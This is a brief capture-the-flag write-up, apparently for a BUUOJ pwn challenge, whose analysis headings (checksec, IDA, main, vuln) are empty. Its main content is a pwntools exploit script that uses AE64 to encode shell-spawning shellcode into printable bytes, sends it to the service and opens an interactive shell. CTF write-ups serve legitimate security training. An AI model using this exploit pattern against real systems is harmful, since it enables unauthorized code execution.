Challenge
Challenge link
checksec

IDA
main

vuln


root

shellcode

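There is a shellcode execution path
Attack approach
After reading through the code, the main difficulty turns out to be constructing printable shellcode.
I wasn't in good shape today and didn't dig into it, so I used ae64; later I'll try writing one by hand myself.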
exp
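from pwn import *
from ae64 import AE64

context.log_level = 'debug'
context.arch = 'amd64'
context.terminal = ['tmux', 'splitw', '-h']

# debug = 1 runs the local binary, otherwise connect to the remote instance
debug = 1
if debug:
    io = process('./service')
else:
    io = remote('node5.buuoj.cn', 26980)

def attack():
    # Request 1: opt 1 with msg "ro0t"
    payload = b'opt:1\nmsg:ro0t \n\n'
    io.sendafter(b'>>> ', payload)
    # Encode shellcraft.sh() as printable shellcode with AE64;
    # 'rdx' is the register AE64 is told points at the shellcode
    sc = AE64().encode(asm(shellcraft.sh()), 'rdx')
    # Request 2: opt 2 with the encoded shellcode as msg
    payload = b'opt:2\nmsg:' + sc + b' \n\n'
    io.sendafter(b'>>> ', payload)
    io.interactive()

attack()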